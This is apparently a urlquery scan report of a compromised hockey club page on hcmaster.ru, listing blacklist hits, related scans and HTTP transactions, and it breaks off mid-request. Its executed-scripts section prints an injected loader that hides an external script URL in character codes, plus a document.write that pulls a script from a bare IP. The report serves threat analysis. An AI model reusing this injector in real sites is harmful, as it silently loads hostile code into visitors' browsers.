Overview

URL hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
IP 195.208.1.119
ASN AS25535 Autonomous Non-commercial Organization 'Regional Network Information Center'
Location Russian Federation
Report completed 2019-02-11 06:49:38 CET
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-02-11 2 hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roma (...) Malware
2019-02-11 2 hcmaster.ru/assets/template/script/jquery-1.11.3.js Malware
2019-02-11 2 hcmaster.ru/assets/template/plugin/owl_carousel/owl.carousel.min.js Malware
2019-02-11 2 hcmaster.ru/assets/template/script/form.js Malware
2019-02-11 2 hcmaster.ru/assets/template/plugin/fancybox/jquery.fancybox.pack.js Malware
2019-02-11 2 hcmaster.ru/assets/template/script/main.js Malware
2019-02-11 2 hcmaster.ru/assets/template/image/image/fav1.ico Malware
2019-02-11 2 134.249.116.78/jquery.js Malware
2019-02-11 2 185.143.221.14/?key=jELb8ThlZZ0lGKvjzQy021gUsAZQSACs Malware
2019-02-11 2 sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d Malware
2019-02-11 2 www.learningtoolkit.club/link.php?ver=2 Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 195.208.1.119

Date  UQ / IDS / BL  URL  IP
2019-06-10 22:28:48 +0200  0 - 1 - 0  iftp.ru/  195.208.1.119
2019-06-09 14:41:17 +0200  0 - 3 - 10  hcmaster.ru/incommodity  195.208.1.119
2019-06-04 09:49:27 +0200  0 - 0 - 23  limaxbatteries.com/tvuxjj2/wc7jang.php  195.208.1.119
2019-05-27 04:59:46 +0200  0 - 5 - 10  hcmaster.ru/haematologist_300803665  195.208.1.119
2019-05-26 03:17:12 +0200  0 - 0 - 1  hcmaster.ru/renvoigoldeneye  195.208.1.119
2019-05-24 08:18:50 +0200  0 - 3 - 10  hcmaster.ru/299807961_nammanamma  195.208.1.119
2019-05-24 08:17:32 +0200  0 - 4 - 10  hcmaster.ru/300341462-stupendously  195.208.1.119
2019-05-23 09:40:06 +0200  0 - 3 - 10  hcmaster.ru/  195.208.1.119
2019-05-16 16:12:45 +0200  0 - 3 - 11  hcmaster.ru/298746131-millimespeak/speak/cf17 (...)  195.208.1.119
2019-05-16 15:17:39 +0200  0 - 4 - 10  hcmaster.ru/prodigious/2792159_wretchedness.love  195.208.1.119

Last 10 reports on ASN: AS25535 Autonomous Non-commercial Organization 'Regional Network Information Center'

Date  UQ / IDS / BL  URL  IP
2019-06-15 16:53:42 +0200  0 - 0 - 10  www.teslateam.online  195.208.1.105
2019-06-11 00:14:58 +0200  0 - 6 - 0  ist.spb.su/  195.208.1.132
2019-06-10 22:28:48 +0200  0 - 1 - 0  iftp.ru/  195.208.1.119
2019-06-10 20:31:36 +0200  0 - 0 - 1  millenniumplaza.ru/vdu1mdv0enhmodgyoxv4  195.208.1.105
2019-06-10 20:22:11 +0200  0 - 0 - 1  npobastion.ru/catalog/istochniki-pitaniya-dly (...)  195.208.1.167
2019-06-10 19:53:04 +0200  0 - 0 - 1  v2.amtrade-eng.ru/sources/primary/cont/onstep (...)  195.208.1.107
2019-06-10 19:37:41 +0200  0 - 0 - 1  ostmedic.ru/netflix-web-serveraccounts-www  195.208.1.105
2019-06-10 19:15:03 +0200  0 - 0 - 1  socio-research.ru/new/s-mg5.mail.yahoo.com.htm  195.208.1.107
2019-06-10 18:49:22 +0200  0 - 4 - 1  stomatologia.spb.su/sites/default/files/ctool (...)  178.210.89.119
2019-06-10 18:49:21 +0200  0 - 4 - 1  stomatologia.spb.su/sites/default/files/ctool (...)  178.210.89.119

Last 10 reports on domain: hcmaster.ru

Date  UQ / IDS / BL  URL  IP
2019-06-09 14:41:17 +0200  0 - 3 - 10  hcmaster.ru/incommodity  195.208.1.119
2019-05-27 04:59:46 +0200  0 - 5 - 10  hcmaster.ru/haematologist_300803665  195.208.1.119
2019-05-26 03:17:12 +0200  0 - 0 - 1  hcmaster.ru/renvoigoldeneye  195.208.1.119
2019-05-24 08:18:50 +0200  0 - 3 - 10  hcmaster.ru/299807961_nammanamma  195.208.1.119
2019-05-24 08:17:32 +0200  0 - 4 - 10  hcmaster.ru/300341462-stupendously  195.208.1.119
2019-05-23 09:40:06 +0200  0 - 3 - 10  hcmaster.ru/  195.208.1.119
2019-05-16 16:12:45 +0200  0 - 3 - 11  hcmaster.ru/298746131-millimespeak/speak/cf17 (...)  195.208.1.119
2019-05-16 15:17:39 +0200  0 - 4 - 10  hcmaster.ru/prodigious/2792159_wretchedness.love  195.208.1.119
2019-05-16 14:28:12 +0200  0 - 4 - 10  hcmaster.ru/fascismob0d5fdo-284755327-utopiat (...)  195.208.1.119
2019-05-15 01:38:34 +0200  0 - 3 - 11  hcmaster.ru/penetrative1c0679e-ramble_304734600  195.208.1.119


JavaScript

Executed Scripts (7)


Executed Evals (1)

#1 JavaScript::Eval (size: 611, repeated: 1) - SHA256: 56b32752f34f320b6e1e4ab77e520801479d805028c79d4c47baf49dfeced197

var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 49, 46, 48, 46, 50);
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;) {
    if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) {
        nt3 = false;
    }
}
if (nt3 == true) {
    document.getElementsByTagName("head")[0].appendChild(somestring);
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 55, repeated: 1) - SHA256: b1247cfc4a293243fe51e76445f0c7fbdec493b931a59e722826bf77015b9514

<script src="http://134.249.116.78/jquery.js"></script>
                                    


HTTP Transactions (41)


Request Response
                                        
                                            GET /the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: MODX Revolution
Set-Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; expires=Mon, 18-Feb-2019 05:48:56 GMT; Max-Age=604800; path=/; HttpOnly browser=standard; expires=Mon, 18-Feb-2019 05:48:57 GMT; Max-Age=604800; path=/; httponly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   43215
Md5:    97ef0f326bb17bf0a3ec3a6afdbbeb03
Sha1:   9510a3497e0084f080826645728fd9fa31371fb9
Sha256: e1a2304c8212e8bfa02992153807d1da540fb103041c92b1c0d7683dbeec726d

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/style/normalize-4.1.1.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7278
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:47 GMT
Etag: "57acca33-1c6e"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII English text
Size:   7278
Md5:    fc852e6163cb2c0f3a6375bd02b989a6
Sha1:   0fbcdd2442991b69033715164e074757e74c919e
Sha256: 1635aa1c8e1b26ef21319ae45f2e76b6f96f2dc087a1c931a61621e38fe80c66
                                        
                                            GET /assets/template/fonts/styles.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7584
Connection: keep-alive
Last-Modified: Sat, 20 Aug 2016 11:22:27 GMT
Etag: "57b83d73-1da0"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   7584
Md5:    9364a0451a113740ceaecb92ea20297d
Sha1:   095f74b3ca483606cb0becaa3c21bb0f7ddcd7d6
Sha256: 16080ec90f15bd71ea2ee2915cda17047c56d01222640175eb186c95c9e03bf4
                                        
                                            GET /assets/template/plugin/owl_carousel/assets/owl.carousel.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 4614
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:47 GMT
Etag: "57acca33-1206"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text
Size:   4614
Md5:    b51416af9e8adbe3d16f5f2526aba221
Sha1:   097c8d67412f44534449ed4cadc6dd22b025801d
Sha256: dd7b97c7ad9d7b3eb79bdc728bcbc6a7ab8e3d5db0421fb0dd16d34f3dc88277
                                        
                                            GET /assets/template/plugin/fancybox/jquery.fancybox.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 4895
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:46 GMT
Etag: "57acca32-131f"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text
Size:   4895
Md5:    6c55951ce1e3115711f63f99b7501f3a
Sha1:   5f163444617b6cf267342f06ac166a237bb62df9
Sha256: 968a8e56e4adaf8c135199ebd7f6cc065424ca45974d4dfbeb5607e69fe72fcd
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.207.195
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Feb 2019 05:48:57 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    0fea75198090d1580a3a1750aa282919
Sha1:   154ec8280208ea0be8cf1073bbe1c6d0eddd41fc
Sha256: d11953a680268bde1c701bb6d85f75fb812d878f2efb3a4b937c4dad53607d39
                                        
                                            GET /assets/template/style/skeleton-2.0.4.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 23161
Connection: keep-alive
Last-Modified: Sun, 18 Sep 2016 12:33:54 GMT
Etag: "57de89b2-5a79"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  UTF-8 Unicode C program text, with CRLF line terminators
Size:   23161
Md5:    ebbfae37e8f41a14b87e61de43966dd7
Sha1:   6c46f78a3e1f5d38b2f9bd7a159becbb3c95cf5e
Sha256: fb4c24318ba0289647395bbf6c32bb3584394a2004b9dfa8a4d16322183549dd
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         216.58.207.195
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Feb 2019 05:48:57 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    d9d754520ae3340aa37cca6115eee05b
Sha1:   a0320372760d99c762cb2eb4b37f776625ef1b33
Sha256: 7dc8284c51c9a38dc1bf03bd28857ea5336e8f5c564eddbb1c9082ee43c93738
                                        
                                            GET /assets/template/style/main.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 68998
Connection: keep-alive
Last-Modified: Wed, 12 Apr 2017 19:32:47 GMT
Etag: "58ee80df-10d86"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   68998
Md5:    cc0addb87067588bb32a43309557a482
Sha1:   fe997c60f64dbc7d4a8982997fa2d61a6cf92c51
Sha256: 6aef6eb3e3ea46bb3b8bc2014244fba5253eb01d8dceec285a74a17d10e52c39
                                        
                                            GET /assets/template/script/jquery-1.11.3.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7942
Connection: keep-alive
Last-Modified: Thu, 27 Sep 2018 02:19:49 GMT
Etag: "5bac3e45-1f06"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   7942
Md5:    13793f1b78b81ba2cf1dbd33bba7cf3c
Sha1:   2d1932e46d03af7cf7197903875004f45470f2cf
Sha256: ca12180f4e90561ce7f32d36bc526fbc24a7a218ba0413cfd6f70161160dbbe4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/plugin/owl_carousel/owl.carousel.min.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 431
Connection: keep-alive
Last-Modified: Thu, 19 Jul 2018 09:03:35 GMT
Etag: "5b5053e7-1af"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   431
Md5:    1cae0711eccb3a109fb3fb29c3880a9d
Sha1:   7d8fd3a80efc4163a5c9811a2e43f4bd5da60435
Sha256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/script/form.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 431
Connection: keep-alive
Last-Modified: Thu, 19 Jul 2018 09:03:35 GMT
Etag: "5b5053e7-1af"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   431
Md5:    1cae0711eccb3a109fb3fb29c3880a9d
Sha1:   7d8fd3a80efc4163a5c9811a2e43f4bd5da60435
Sha256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/style/media.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 31463
Connection: keep-alive
Last-Modified: Wed, 12 Apr 2017 19:34:02 GMT
Etag: "58ee812a-7ae7"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   31463
Md5:    dea4aad6e8e85f1145fd9a35c2672715
Sha1:   32a23f297e639a820f15dfc6db59c7f1588185ed
Sha256: 78bf02dc4ea5163abe2e7e7a219c3e16faa939ab621b49b2dc575994d17ff87c
                                        
                                            GET /assets/template/plugin/fancybox/jquery.fancybox.pack.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7942
Connection: keep-alive
Last-Modified: Thu, 27 Sep 2018 02:19:49 GMT
Etag: "5bac3e45-1f06"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   7942
Md5:    13793f1b78b81ba2cf1dbd33bba7cf3c
Sha1:   2d1932e46d03af7cf7197903875004f45470f2cf
Sha256: ca12180f4e90561ce7f32d36bc526fbc24a7a218ba0413cfd6f70161160dbbe4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/script/main.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 431
Connection: keep-alive
Last-Modified: Thu, 19 Jul 2018 09:03:35 GMT
Etag: "5b5053e7-1af"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   431
Md5:    1cae0711eccb3a109fb3fb29c3880a9d
Sha1:   7d8fd3a80efc4163a5c9811a2e43f4bd5da60435
Sha256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/style/animate.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 72259
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:47 GMT
Etag: "57acca33-11a43"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII English text
Size:   72259
Md5:    07f146141537e04ee282a965d8053198
Sha1:   5bac0162dbfcfd0c701b8d0848411a288c27a2c2
Sha256: d34c3af0d3b74cbb878ca4472668ebae02410ed1bfe8e85b244bb582d1dcb2ea
                                        
                                            GET /assets/template/image/image/logo.png HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5835
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 19:15:34 GMT
Etag: "57acced6-16cb"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 106 x 109, 8-bit/color RGBA, non-interlaced
Size:   5835
Md5:    96dde3c6ee2f6c9f25c4c55b57fe4c21
Sha1:   06ba9d26e7f0e5b04354b2df173e35cc0ad5a8e3
Sha256: ed7d45dc1e0c4deabb338ee788e5c51260fdb4f5fba99218236543df57ca5436
                                        
                                            GET /assets/cache_image/source/news/1W0A7021_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5910
Connection: keep-alive
Last-Modified: Fri, 13 Oct 2017 15:24:13 GMT
Etag: "59e0da9d-1716"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   5910
Md5:    7cfb4763b650477641cf5f08912a9b99
Sha1:   5ad4fcad327e483c3dff77252e2a711e99392975
Sha256: fea0e57a8cbd85cffa54cd53059aae6c823d3cb233cf5bc455946801ff05b83b
                                        
                                            GET /assets/cache_image/source/news/18921132_1890685824290227_20211078272281866_o_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
